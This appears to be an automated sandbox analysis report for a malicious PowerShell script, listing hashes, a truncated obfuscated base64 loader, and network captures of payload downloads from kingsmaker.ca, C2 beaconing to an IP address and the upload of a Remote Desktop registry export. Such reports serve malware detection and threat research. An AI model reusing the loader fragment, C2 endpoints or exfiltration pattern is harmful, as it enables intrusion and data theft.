SHA-512:	C3CF7BADAD40C63C0479DD7A50762968038A9D402E8AE34697F30D09E206D5D090270013504B801EECB82D234280535E21629A6F23F1F04CE1CF2D3EF0C37051
Malicious:	true
Preview:	..W.i.n.d.o.w.s. .R.e.g.i.s.t.r.y. .E.d.i.t.o.r. .V.e.r.s.i.o.n. .5...0.0.........[.H.K.E.Y._.L.O.C.A.L._.M.A.C.H.I.N.E.\.S.Y.S.T.E.M.\.C.u.r.r.e.n.t.C.o.n.t.r.o.l.S.e.t.\.S.e.r.v.i.c.e.s.\.T.e.r.m.S.e.r.v.i.c.e.].....".D.e.p.e.n.d.O.n.S.e.r.v.i.c.e.".=.h.e.x.(.7.).:.5.2.,.0.0.,.5.0.,.0.0.,.4.3.,.0.0.,.5.3.,.0.0.,.5.3.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.....".D.e.s.c.r.i.p.t.i.o.n.".=.".@.%.S.y.s.t.e.m.R.o.o.t.%.\.\.S.y.s.t.e.m.3.2.\.\.t.e.r.m.s.r.v...d.l.l.,.-.2.6.7.".....".D.i.s.p.l.a.y.N.a.m.e.".=.".@.%.S.y.s.t.e.m.R.o.o.t.%.\.\.S.y.s.t.e.m.3.2.\.\.t.e.r.m.s.r.v...d.l.l.,.-.2.6.8.".....".E.r.r.o.r.C.o.n.t.r.o.l.".=.d.w.o.r.d.:.0.0.0.0.0.0.0.1.....".F.a.i.l.u.r.e.A.c.t.i.o.n.s.".=.h.e.x.:.8.0.,.5.1.,.0.1.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.3.,.0.0.,.0.0.,.0.0.,.1.4.,.0.0.,.0.0.,.\..... . .0.0.,.0.1.,.0.0.,.0.0.,.0.0.,.6.0.,.e.a.,.0.0.,.0.0.,.0.1.,.0.0.,.0.0.,.0.0.,.6.0.,.e.a.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.6.0.,.e.a.,.0.0.,.0.0.....".I.m.a.g.e.P.a.t.h.".=.h.e.x.

File type:	ASCII text, with very long lines (1373)
Entropy (8bit):	5.917973637177553
TrID:
File name:	kingsmaker_6.ca.ps1
File size:	6'432 bytes
MD5:	5705390f445a1b38b4c19461d81a9237
SHA1:	fa9112a883c4fc8e4eb0b425e2c7462c6fee3877
SHA256:	2a5101990c3fbe7274c5bf8bd72ba0f2c1d839eac121858602843f7702728015
SHA512:	f99d8285c44783538114b41f248e332f75eb2ca1170ff17be85f4918b948ca97218d0b1ff19d8c9358382e81961831cf6eda61ab3e33f35c3d694c75a3a146ad
SSDEEP:	192:ZPVgowea4PnwWiwvPdnQZFP/a2P5PP0PyPePLPIPHP3TPJPyP2IPXPWPkPCPPHPs:ZPbwea4PLPdn4P/a2P5PMPyPePLPIPHu
TLSH:	0CD152315B25EB4C05B026AF9508E89453340BB97624BCE9BBC2EC9DD2D21D27A7B358
File Content Preview:	$snvqvqv=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("WEpwWFRvNlJYTmpZWEJsUkdGMFlWTjBjbWx1WnloYlJXNTJhWEp2Ym0xbGJuUmRPanBWYzJWeVRtRnRaU2s3RFFva2RYSnNJRDBnSW1oMGRIQnpPaTh2YTJsdVozTnRZV3RsY2k1allTOW1hV3hsTXk5ak16QTFOalZtTldJM1

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2024 09:08:57.827466011 CET	63648	53	192.168.11.30	1.1.1.1
Nov 29, 2024 09:08:57.987987041 CET	53	63648	1.1.1.1	192.168.11.30
Nov 29, 2024 09:09:16.316426039 CET	65196	53	192.168.11.30	1.1.1.1
Nov 29, 2024 09:09:16.476017952 CET	53	65196	1.1.1.1	192.168.11.30
Nov 29, 2024 09:09:22.652412891 CET	52738	443	192.168.11.30	172.64.41.3
Nov 29, 2024 09:09:22.813910961 CET	443	52738	172.64.41.3	192.168.11.30
Nov 29, 2024 09:09:22.813955069 CET	443	52738	172.64.41.3	192.168.11.30
Nov 29, 2024 09:09:22.813985109 CET	443	52738	172.64.41.3	192.168.11.30
Nov 29, 2024 09:09:22.815511942 CET	52738	443	192.168.11.30	172.64.41.3
Nov 29, 2024 09:09:22.835443020 CET	52738	443	192.168.11.30	172.64.41.3
Nov 29, 2024 09:09:22.835576057 CET	52738	443	192.168.11.30	172.64.41.3
Nov 29, 2024 09:09:22.836188078 CET	52738	443	192.168.11.30	172.64.41.3
Nov 29, 2024 09:09:22.994829893 CET	443	52738	172.64.41.3	192.168.11.30
Nov 29, 2024 09:09:22.994865894 CET	443	52738	172.64.41.3	192.168.11.30
Nov 29, 2024 09:09:22.994885921 CET	443	52738	172.64.41.3	192.168.11.30
Nov 29, 2024 09:09:22.994908094 CET	443	52738	172.64.41.3	192.168.11.30
Nov 29, 2024 09:09:22.996280909 CET	443	52738	172.64.41.3	192.168.11.30
Nov 29, 2024 09:09:22.998286009 CET	443	52738	172.64.41.3	192.168.11.30
Nov 29, 2024 09:09:22.998894930 CET	52738	443	192.168.11.30	172.64.41.3
Nov 29, 2024 09:09:22.998941898 CET	52738	443	192.168.11.30	172.64.41.3
Nov 29, 2024 09:09:23.025675058 CET	52738	443	192.168.11.30	172.64.41.3
Nov 29, 2024 09:09:23.158060074 CET	443	52738	172.64.41.3	192.168.11.30
Nov 29, 2024 09:09:23.184878111 CET	52738	443	192.168.11.30	172.64.41.3
Nov 29, 2024 09:09:36.760760069 CET	63308	53	192.168.11.30	1.1.1.1
Nov 29, 2024 09:09:36.920553923 CET	53	63308	1.1.1.1	192.168.11.30

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 09:09:40.654823065 CET	72	OUT	GET /api/check HTTP/1.1 Host: kingsmaker.ca Connection: Keep-Alive
Nov 29, 2024 09:09:41.144093037 CET	1289	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:09:41 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Cache-Control: no-store,no-cache Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mpftP27n0YI67DCl55Af2Pq5zmeP8Uj%2FkY1L9RbIR0pgne0%2BRyms1VfT5k%2BL6L9DPa41zya0OxVeyEDWBjGHuztavNuFz6%2F3YuKdbtswy0JQfFKyA8VYFpJ5l%2FlkQylydW3X%2B01KrglP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=12979&min_rtt=1133&rtt_var=20576&sent=22&recv=26&lost=0&retrans=0&sent_bytes=15449&recv_bytes=10686&delivery_rate=9598246&cwnd=212&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea11ded98aca984-LAS server-timing: cfL4;desc="?proto=TCP&rtt=159210&min_rtt=159210&rtt_var=79605&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=72&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 36 33 0d 0a 31 37 33 32 38 36 37 37 38 30 7c 6e 35 42 35 42 55 63 36 71 5a 54 77 45 47 35 6c 63 36 39 37 30 68 6c 49 78 62 39 34 59 69 53 4d 6e 33 57 79 2f 4f 63 5a 69 67 72 42 52 4e 34 78 42 42 66 6d 31 54 54 4f 78 6c 63 7a 75 55 68 6d 36 43 4d 2f 42 62 70 62 65 56 74 39 48 46 79 74 4c 66 6b 43 74 4e 58 34 6a 39 4b 61 38 36 68 41 2f 6c 39 72 2f 54 6d 41 74 33 56 4c 73 4d 53 71 38 5a 62 58 34 32 4d 4e 76 37 59 36 55 50 6d 52 50 52 75 46 6b 72 4c 50 33 2f 56 43 62 4e 6d 34 63 37 54 79 57 42 79 54 55 67 6c 4e 2f 73 66 37 44 72 66 55 4d 68 43 46 2f 46 46 55 61 62 41 51 37 2b 5a 52 74 68 66 69 4a 41 56 73 78 77 39 4c 71 71 53 2f Data Ascii: 1631732867780\|n5B5BUc6qZTwEG5lc6970hlIxb94YiSMn3Wy/OcZigrBRN4xBBfm1TTOxlczuUhm6CM/BbpbeVt9HFytLfkCtNX4j9Ka86hA/l9r/TmAt3VLsMSq8ZbX42MNv7Y6UPmRPRuFkrLP3/VCbNm4c7TyWByTUglN/sf7DrfUMhCF/FFUabAQ7+ZRthfiJAVsxw9LqqS/
Nov 29, 2024 09:09:41.144138098 CET	150	IN	Data Raw: 6a 67 6d 32 2b 39 6d 79 79 39 4b 41 39 68 67 74 46 69 37 56 56 72 33 30 69 4b 76 57 75 33 36 61 64 36 69 2b 53 78 72 48 2f 58 31 74 6a 44 73 54 79 48 79 42 69 54 6e 36 70 4f 35 74 6f 51 64 51 6d 50 76 51 56 6d 38 32 61 34 61 4d 68 66 6f 55 57 30 Data Ascii: jgm2+9myy9KA9hgtFi7VVr30iKvWu36ad6i+SxrH/X1tjDsTyHyBiTn6pO5toQdQmPvQVm82a4aMhfoUW0lqWgJP8AcUZa6d7qdd+PjzPCQ1EO8N4Ou7Rxzt8gXS9QrdXLvkp/5o3XlA/0HtFg==
Nov 29, 2024 09:09:41.144171953 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 09:10:40.757949114 CET	164	OUT	GET /client/ws HTTP/1.1 Host: 23.88.71.29:8000 Connection: Upgrade Upgrade: websocket Sec-WebSocket-Key: HypkmC7LuEqn6kjELov16g== Sec-WebSocket-Version: 13
Nov 29, 2024 09:10:41.621452093 CET	847	IN	HTTP/1.1 101 Switching Protocols Upgrade: Websocket Server: Microsoft-IIS/8.5 Sec-Websocket-Accept: pIxbHB6PWzkLnVMK9KCpblsjnoU= CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fg7sQBlmks%2FRh3oJXPZXVaAuEwvwp2n8KYaVhn4sAEv47uaeiKCRRFMufkKfJs49XkDTWZVNE2z7999M85x7EVTdpdQX2ZR5F0%2BsBD0WImJbT4GEuyHcY7SpKfLtpvGNoUvvnKPUgZK4"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} CF-RAY: 8ea11f65bd01d21f-FRA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=6410&min_rtt=5504&rtt_var=3276&sent=10&recv=12&lost=0&retrans=0&sent_bytes=1661&recv_bytes=6928&delivery_rate=494999&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Connection: Upgrade Date: Fri, 29 Nov 2024 08:10:41 GMT

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 09:10:45.609684944 CET	234	OUT	POST /api/registry HTTP/1.1 Host: 23.88.71.29:8000 Connection: Keep-Alive Content-Type: application/json Content-Length: 102 Data Raw: 22 45 43 41 34 45 37 46 36 34 35 43 45 41 42 43 46 31 34 31 44 36 30 32 43 43 33 30 38 39 36 37 32 7c 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 7c 31 30 2e 30 2e 31 39 30 34 32 20 4e 2f 41 20 42 75 69 6c 64 20 31 39 30 34 32 2d 31 30 2e 30 2e 31 39 30 34 31 2e 31 30 38 31 22 Data Ascii: "ECA4E7F645CEABCF141D602CC3089672\|Microsoft Windows 10 Pro\|10.0.19042 N/A Build 19042-10.0.19041.1081"
Nov 29, 2024 09:10:46.479887962 CET	807	IN	HTTP/1.1 200 OK Content-Type: text/html Server: Microsoft-IIS/8.5 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tJdbqYrfjpxAaDRioSqAuayUjZVMjTXtP9Ltpv8gqKMLc%2Br32DY4tOcecpQZk9a1%2BkuCjH4Yegaf2fCrIJ7%2BdV0wOXZwInUkWDVFzSGtWv%2BZx01uyEdQqrNb4tyaXxDtx%2FBSjz7PwDi8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} CF-RAY: 8ea11f841a029018-FRA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5310&min_rtt=5310&rtt_var=2655&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=379&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Date: Fri, 29 Nov 2024 08:10:46 GMT Content-Length: 32 Data Raw: 36 63 63 65 37 31 38 32 64 35 30 65 64 33 64 37 65 36 31 31 34 36 36 63 63 65 61 66 61 35 65 32 Data Ascii: 6cce7182d50ed3d7e611466cceafa5e2

Timestamp	Bytes transferred	Direction	Data
Nov 29, 2024 09:10:46.793979883 CET	2578	OUT	POST /api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2 HTTP/1.1 Host: 23.88.71.29:8000 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=---------------------8dd10236a5b037d Content-Length: 5689 Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 30 32 33 36 61 35 62 30 33 37 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 72 65 67 42 61 63 6b 75 70 2e 72 65 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff fe 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 20 00 52 00 65 00 67 00 69 00 73 00 74 00 72 00 79 00 20 00 45 00 64 00 69 00 74 00 6f 00 72 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 20 00 35 00 2e 00 30 00 30 00 0d 00 0a 00 0d 00 0a 00 5b 00 48 00 4b 00 45 00 59 00 5f 00 4c 00 4f 00 43 00 41 00 4c 00 5f 00 4d 00 41 00 43 00 48 00 49 00 4e 00 45 00 5c 00 53 00 59 00 53 00 54 00 45 00 4d 00 5c 00 43 00 75 00 72 00 72 00 65 00 6e 00 74 00 43 00 6f 00 6e 00 74 00 72 00 6f 00 6c 00 53 00 65 00 74 00 5c 00 53 00 65 00 72 00 76 00 69 00 63 00 65 [TRUNCATED] Data Ascii: -----------------------8dd10236a5b037dContent-Disposition: form-data; name="file"; filename="regBackup.reg"Content-Type: application/octet-streamWindows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]"DependOnService"=hex(7):52,00,50,00,43,00,53,00,53,00,00,00,00,00"Description"="@%SystemRoot%\\System32\\termsrv.dll,-267""DisplayName"="@%SystemRoot%\\System32\\termsrv.dll,-268""ErrorControl"=dword:00000001"FailureActions"=hex:80,51,01,00,00,00,00,00,00,00,00,00,03,00,00,00,14,00,00,\ 00,01,00,00,00,60,ea, [TRUNCATED]
Nov 29, 2024 09:10:47.331705093 CET	839	IN	HTTP/1.1 200 OK Content-Type: text/plain; charset=utf-8 Server: Microsoft-IIS/8.5 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xyhqIJb0eGc0%2Fx1AHHryDTaz53oHSTCuONij58BfaGkPX6pnrpwlm8EqS%2FZNStgZNQI11GRQmSFbsiNT0e7arRCODbA%2B9KiGZiw%2FyAbkJE6BeFY1Z4Xdix31YliEHmogaR0aryXpLFJ2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} CF-RAY: 8ea11f8b7e4d9018-FRA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5314&min_rtt=5309&rtt_var=2001&sent=9&recv=11&lost=0&retrans=0&sent_bytes=820&recv_bytes=6476&delivery_rate=545896&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Date: Fri, 29 Nov 2024 08:10:46 GMT Content-Length: 41 Data Raw: 46 69 6c 65 20 72 65 67 42 61 63 6b 75 70 2e 72 65 67 20 75 70 6c 6f 61 64 65 64 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e Data Ascii: File regBackup.reg uploaded successfully.

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:08:58 UTC	392	OUT	GET /file3/c30565f5b7d349dca2c674865a83c8be2eda701bd9fa3efd6b1a406548e08a5241b9e3eb87ec64b75eef9f6703a3eb783bfa9ee7e92345daa3a62b976fb3d4ee238d363a7b5e9cf6d398cb37e4de3d85ec1f5daf0cf8c35fefe5c7fdd20dd092/Windows%20Defender/16/16/user/189 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: kingsmaker.ca Connection: Keep-Alive
2024-11-29 08:08:58 UTC	1117	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:08:58 GMT Content-Type: application/octet-stream Content-Length: 2856 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3wcF%2BscT%2BZS9JuzvYKcL1Fta7x5oMHCg%2BpCNA0sPglwV%2FuQiugIpEwyv%2F4Ic9gjv%2BrfnGn4%2Fp7lJnswKLrNZitvyqegd4s92hQoUkhGz%2BZiOF7ry281mcrmLkTjKePb5nLzEjjW4z48c"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=36512&min_rtt=1072&rtt_var=28093&sent=54&recv=70&lost=0&retrans=0&sent_bytes=13373&recv_bytes=43995&delivery_rate=2600178&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea11ce65a0809f7-LAS server-timing: cfL4;desc="?proto=TCP&rtt=158718&min_rtt=158625&rtt_var=33602&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1006&delivery_rate=24105&cwnd=252&unsent_bytes=0&cid=ead1366f67cec06e&ts=673&x=0"
2024-11-29 08:08:58 UTC	252	IN	Data Raw: 25 76 75 66 76 67 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 4e 59 47 6b 4c 6b 6d 30 52 56 71 7b 55 6a 4f 6f 4c 44 75 4b 50 31 47 6f 52 54 4f 52 63 30 71 59 53 6c 75 60 56 44 71 37 57 32 6d 52 62 6d 71 58 63 46 53 4b 53 45 43 6f 52 6a 69 60 60 46 4b 48 57 6c 79 51 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 54 6b 47 6b 63 56 75 6f 54 47 4f 43 60 56 47 48 54 6b 43 6b 52 44 31 33 55 49 6a 34 62 6c 47 59 4f 56 34 6b 4c 6b 47 6e 58 55 4b 56 64 54 79 75 55 6c 69 4c 64 6d 4b 70 56 56 30 53 4c 6a 30 37 5b 46 69 4f 57 46 69 70 56 57 53 6b 4c 31 30 44 60 46 79 51 53 44 30 35 56 Data Ascii: %vufvg<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#NYGkLkm0RVq{UjOoLDuKP1GoRTORc0qYSlu`VDq7W2mRbmqXcFSKSECoRji``FKHWlyQe{CMRTOC[1mETkGkcVuoTGOC`VGHTkCkRD13UIj4blGYOV4kLkGnXUKVdTyuUliLdmKpVV0SLj07[FiOWFipVWSkL10D`FyQSD05V
2024-11-29 08:08:58 UTC	1369	IN	Data Raw: 57 65 47 65 31 38 49 53 6c 6d 4f 57 44 4b 6e 55 57 53 53 65 30 71 54 54 59 65 4f 4c 6d 54 78 56 6c 30 46 60 31 34 54 50 55 47 4e 57 46 72 78 56 6d 53 57 64 54 30 75 52 6c 75 4e 53 47 6a 76 56 57 53 57 4f 57 6d 70 54 6c 6d 4e 60 6d 6d 37 56 6a 53 60 60 6a 34 70 54 55 57 4e 63 54 71 73 56 6d 53 5b 4c 54 30 44 58 32 69 4f 53 47 4b 75 56 56 71 4e 60 44 38 49 56 55 53 5b 60 6a 31 30 55 6f 71 47 4c 54 30 55 52 55 65 44 54 56 38 6f 52 54 4f 43 5b 33 53 48 52 6b 57 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 52 49 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 54 6c 6d 68 4c 6d 48 30 52 54 50 76 5b 31 71 49 64 49 5b 60 4c 45 47 72 58 7b 4f 4e 60 47 6e 78 57 6f 71 4b 52 49 65 6f 54 55 48 34 65 56 53 75 57 6f 6d 6a 53 6d 4b 33 Data Ascii: WeGe18ISlmOWDKnUWSSe0qTTYeOLmTxVl0F`14TPUGNWFrxVmSWdT0uRluNSGjvVWSWOWmpTlmN`mm7VjS``j4pTUWNcTqsVmS[LT0DX2iOSGKuVVqN`D8IVUS[`j10UoqGLT0URUeDTV8oRTOC[3SHRkWDTV8oRTOC[1mEPVeKRIONP3mC[1mEPVeKP1GoRTOC[1mETlmhLmH0RTPv[1qIdI[`LEGrX{ON`GnxWoqKRIeoTUH4eVSuWomjSmK3
2024-11-29 08:08:58 UTC	1235	IN	Data Raw: 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 52 6a 69 56 64 56 47 55 50 55 6d 4b 50 31 71 77 5b 44 69 52 65 33 4f 37 63 32 5b 4c 4c 6f 53 76 58 6c 30 6a 64 6c 4b 59 53 6f 4b 60 56 44 6d 30 56 55 4b 47 65 6d 71 75 63 49 4f 60 57 44 6d 33 55 6b 4b 53 4f 54 30 75 54 55 43 60 53 46 4f 34 55 6f 71 4b 4c 6a 34 54 53 59 69 5b 57 46 53 71 55 30 65 57 65 31 30 70 57 6c 75 51 53 44 47 32 55 6f 71 5b 4f 57 6d 70 53 55 4f 5b 57 47 54 31 55 54 53 72 60 6d 71 44 54 6c 75 4f 57 44 5b 72 56 6a 53 56 60 6a 34 70 5b 46 75 4e 64 6c 79 73 55 6a 53 47 4c 30 6d 70 52 6c 79 51 53 30 4b 71 55 6d 65 46 60 44 35 78 55 6c 69 4e 64 6a 6a 30 56 6d 53 4f 4f 57 71 Data Ascii: f\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#RjiVdVGUPUmKP1qw[DiRe3O7c2[LLoSvXl0jdlKYSoK`VDm0VUKGemqucIO`WDm3UkKSOT0uTUC`SFO4UoqKLj4TSYi[WFSqU0eWe10pWluQSDG2Uoq[OWmpSUO[WGT1UTSr`mqDTluOWD[rVjSV`j4p[FuNdlysUjSGL0mpRlyQS0KqUmeF`D5xUliNdjj0VmSOOWq

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:08:59 UTC	284	OUT	POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663d6c6496bde6507104fb3a8f8b397151 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: kingsmaker.ca Content-Length: 302
2024-11-29 08:08:59 UTC	302	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 62 65 67 69 6e 20 64 6f 77 6e 6c 6f 61 64 20 68 74 74 70 73 3a 2f 2f 6b 69 6e 67 73 6d 61 6b 65 72 2e 63 61 2f 66 69 6c 65 32 2f 37 64 39 32 64 34 64 37 32 37 32 36 35 31 31 61 37 62 39 65 30 32 35 64 38 30 30 37 36 39 62 31 37 61 35 38 30 39 63 64 34 64 31 31 65 64 35 63 36 37 64 37 39 64 34 31 37 62 32 65 38 64 62 35 61 61 37 63 61 37 32 39 65 33 39 66 61 63 38 37 66 32 38 66 35 37 64 37 33 35 37 62 66 33 36 65 35 62 34 39 66 32 62 30 63 65 62 63 33 62 64 39 34 64 62 61 33 36 38 66 33 30 61 34 35 61 66 65 30 65 39 39 39 30 30 65 39 30 37 32 38 35 63 66 34 37 64 61 65 63 32 61 34 35 35 61 61 37 34 62 31 30 66 38 30 37 30 61 63 36 34 31 31 61 31 65 64 30 64 39 39 34 30 66 66 64 37 64 36 61 32 62 32 34 66 66 36 64 34 30 30 64 Data Ascii: [ "\"begin download https://kingsmaker.ca/file2/7d92d4d72726511a7b9e025d800769b17a5809cd4d11ed5c67d79d417b2e8db5aa7ca729e39fac87f28f57d7357bf36e5b49f2b0cebc3bd94dba368f30a45afe0e99900e907285cf47daec2a455aa74b10f8070ac6411a1ed0d9940ffd7d6a2b24ff6d400d
2024-11-29 08:09:00 UTC	991	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:09:00 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9xGUIOay27E2gBdcacECotUsGNlC7NdVLo%2F%2FavU5AVdScBAHC%2Bd4h5w2N3ejJW4yJk7GkVqvjqn2grBWoM5D4qgEEdUuHxFL5VaJnZG7CGftQxMlpufCYrf1y4DruCPSKpbF1DbrCdec"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=23479&min_rtt=1209&rtt_var=28326&sent=79&recv=84&lost=0&retrans=0&sent_bytes=36096&recv_bytes=42173&delivery_rate=8133704&cwnd=255&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea11ced5ccb09fd-LAS server-timing: cfL4;desc="?proto=TCP&rtt=158696&min_rtt=158655&rtt_var=33507&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1246&delivery_rate=24128&cwnd=252&unsent_bytes=0&cid=0e3f4a3c658077f1&ts=712&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:09:00 UTC	364	OUT	GET /file2/7d92d4d72726511a7b9e025d800769b17a5809cd4d11ed5c67d79d417b2e8db5aa7ca729e39fac87f28f57d7357bf36e5b49f2b0cebc3bd94dba368f30a45afe0e99900e907285cf47daec2a455aa74b10f8070ac6411a1ed0d9940ffd7d6a2b24ff6d400df08dbb5e2d0894c9d90c9a HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: kingsmaker.ca
2024-11-29 08:09:01 UTC	1109	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:09:01 GMT Content-Type: application/octet-stream Content-Length: 2854 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WqNE7wPWzga%2BJnjbfBM3oQAzu4sNpzSuWawhxrsuNCkCjprMtNliR2VnX%2BtAo7f6rjuV7cjRIB1IraX9FYDl7gjHoHtDj2Pkk%2B53nqZcI7QXWaJg97i9ngZPva2gMCI%2F7ndcGkjqIFm6"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=34368&min_rtt=1072&rtt_var=25772&sent=61&recv=75&lost=0&retrans=0&sent_bytes=17881&recv_bytes=46079&delivery_rate=3563873&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea11cf49c3509f1-LAS server-timing: cfL4;desc="?proto=TCP&rtt=158635&min_rtt=158550&rtt_var=33578&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2831&recv_bytes=1002&delivery_rate=24118&cwnd=252&unsent_bytes=0&cid=095bf2bef8cae97a&ts=666&x=0"
